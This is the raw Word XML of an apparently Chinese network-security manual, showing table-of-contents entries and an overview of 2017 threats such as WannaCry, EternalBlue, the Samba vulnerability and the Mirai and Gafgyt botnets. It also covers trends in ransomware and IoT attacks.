            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.10.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>利用Metasploit实施一次渗透攻击</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884735 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>182</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD53C7" w:rsidRDefault="00FD53C7">
          <w:pPr>
            <w:pStyle w:val="22"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8540"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:smallCaps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc499884736" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:smallCaps w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BPS测试仪</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884736 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>191</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37" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BPS 界面的登录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884737 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>191</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38" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>端口的占用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884738 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>192</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39" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Neighborhood 的配置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884739 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>194</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40" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Security 组件的测试使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884740 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>199</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD53C7" w:rsidRDefault="00FD53C7">
          <w:pPr>
            <w:pStyle w:val="32"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1260"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8540"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="21"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc499884741" w:history="1">
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.11.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00900678">
              <w:rPr>
                <w:rStyle w:val="a3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Application Simulator 组件的测试使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc499884741 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>206</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00864224" w:rsidRPr="00864224" w:rsidRDefault="00864224">
          <w:pPr>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00864224" w:rsidRDefault="00864224">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00725DEE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc499884677"/>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>网络安全形势概要</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>随着互联网的快速发展，网络安全的重要性也愈发凸显。我国于17年6月1日正式实施生效了《中华人民共和国网络安全法》，说明网络安全早已上升到国家层面。由于网络与人们的工作生活越来越密切相关，网络攻击的影响早已不可忽视，当前</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网络攻击有可能逐渐演变为网络恐怖主义，黑客组织有预谋地利用网络并以网络为攻击目标，攻击全球各个国家，并且破坏国家的政治稳定、经济安全，扰乱社会秩序，制造轰动效应的恐怖活动。随着全球信息网络化的发展，破坏力惊人的网络恐怖主义正在成为世界的新威胁</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，网络安全的形势也日益严峻。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00AA2791">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc499884678"/>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络安全现状：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>17年在全球范围内爆发了几大安全事件冲击了全球的安全防线，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3月7日，维基解密（WiKiLeaks）公布了数千份文档并揭秘了美国中央情报局关于黑客入侵技术的最高机密。4月14日，影子经纪人（Shadow Brokers）在steemit.com上公开了一大批NSA（美国国家安全局）“方程式组织” (Equation Group)使用的极具破坏力的黑客工具。连续的泄密事件，直接引发了“WannaCry”勒索病毒的全球爆发，涉及全球150多个国家和地区，10多万的组织机构和超过30万的网民受到影响，损失总计高达500多亿人民币，包括医院，教育机构，政府部门都无一例外的遭受到了攻击。随后，“Petya”勒索病毒影响乌克兰、俄罗斯、印度、西班牙、法国、英国、丹麦等多个国家的政府、银行、企业、电力系统、通讯系统及机场；“FireBall火球病毒”造成全球2.5亿台电脑中毒，并跟踪用户数据和暗中搜集用户信息；再度升级的“暗云Ⅲ”病毒导致大量电脑沦为“肉鸡”形成“僵尸网络”，感染量也达到数百万级。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>眼下</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>全球网络扫描</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>活动也</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>异常活跃</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网络扫描是一些网络攻击的前奏，也是一些网络威胁活动的体现，通过捕捉网络扫描行为，可以感知到网络空间的威胁态势，是了解网络空间安全状况的最好途径之一</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。从</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>瑞星全球威胁情报采集网络采集的网络扫描数据</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>和分析报告</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以看出</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Telnet默认端口成为最大被扫描对象</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>大量的Telnet扫描来自于服务器、网络设备、IoT设备等运行Linux系统的计算设备，主要原因是目前相当活跃的巨大的僵尸网络，例如Linux.Gafgyt和Linux.Mirai这两大僵尸网络家族。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>另外445端口也是被探测较多的一个端口，</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>17年</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NSA武器库泄露，通过445端口利用“永恒之蓝”漏洞，成为入侵Windows系统计算机的最为简单便捷的方法。不久前Linux 上使用的Samba服务也爆出远程执行漏洞(CVE-2017-7494),影响Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间的版本，同样是使用445端口，被称为Linux上的“永恒之蓝”。Windows系统和Linux系统这两个漏洞的产生直接导致了445端口的疯狂扫描和针对性的攻击事件的暴增。通过该漏洞传播的WannaCry勒索以及后来的Petya，同时借助该漏洞传播的门罗币挖矿机和组建僵尸网络的各种BOT肆虐网络，极大破坏了网络环境。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>此外对于数据库服务器的扫描活动也是频繁可见，说明</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“扫描者”对数据库服务及数据资产的</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>有着极强的欲望</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>僵尸网络</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>还在</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>持续影响</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>着</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>全球网络</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据2017上半年采集的数据显示，全球范围内最为活跃的两大著名的僵尸网络，分别为Linux.Gafgyt/Linux 和 Linux.Mirai。Linux.Gafgyt最主要的功能是Telnet扫描。在执行Telnet扫描时，木马会尝试连接随机IP地址的23号端口。如果连接成功，木马会根据内置的用户名/密码列表，尝试猜测登录。登录成功后，木马会发出相应命令，下载多个不同</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>架构的BOT可执行文件，并尝试运行。Linux.Mirai病毒是一种通过互联网搜索并控制物联网设备并发起DDOS攻击的一种病毒，当扫描到一个物联网设备（比如网络摄像头、智能开关等）后就尝试使用默认密码进行登陆，一旦登陆成功，这台物联网设备就进入“肉鸡”名单，黑客操控此设备开始攻击其他网络设备。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc499884679"/>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>威胁发展的趋势：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（一）勒索软件蠕虫化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>勒索软件蠕虫化的结果是恐怖的，2017年的WannaCry就震惊全球。通过蠕虫的传播手段将勒索软件迅速的分发到全球存在漏洞的机器上，造成的破坏将是毁灭性的。以往的传播手段主要是通过垃圾邮件和EK工具网站挂马等，采用被动手段，效果有限。但通过蠕虫化被动为主动，将起到“事半功倍”的效果。“WannaCry”已经验证了效果。不能想象勒索软件和蠕虫在不久的将来将会结合得愈来愈紧密。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（二）Linux病毒仍保持快速增长</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>瑞星“云安全”系统</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在17年上半年</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>截获Linux病毒样本总量</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>统计，其数量</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>42万个远远超过了2013年、2014年和2015年的总和。在接下来几年中针对Linux 的病毒将要有爆发性的增长。这种增长势头可以预见仍将持续很长一段时间。</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>另外</w:t>
      </w:r>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>针对Linux系统的勒索软件数量也开始上升，虽然数量远远不及Windows平台，主要还是受众人群数量少和攻击面狭窄的原因，但是一被勒索，损失将会非常惨重。相对于个人PC而言，运行Linux的服务器、网络设备、IoT设备，一旦受到勒索软件的入侵，将导致数据丢失、系统停机等现象，后果更为严重，损失也更为巨大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（三）物联网（IoT）设备面临的安全威胁越发突出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD15D1" w:rsidRPr="009655A2" w:rsidRDefault="00BD15D1" w:rsidP="00BD15D1">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009655A2">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IoT设备最近几年发展神速，但是随之增加的安全问题愈加严峻。这些设备中往往缺乏相关的安全措施，而且这些设备大多运行基于Linux的操作系统，攻击者利用Linux的已知漏洞，能够轻易实施攻击。致使大半个美国断网的Mirai，以DVR设备为目标的Amnesia，感染家庭路由器用来”挖矿”的Darlloz等病毒都将矛头指向了这些脆弱的IoT设备。可以预见这些脆弱的IoT设备随着数量的增加，安全问题将愈发严峻。</w:t>
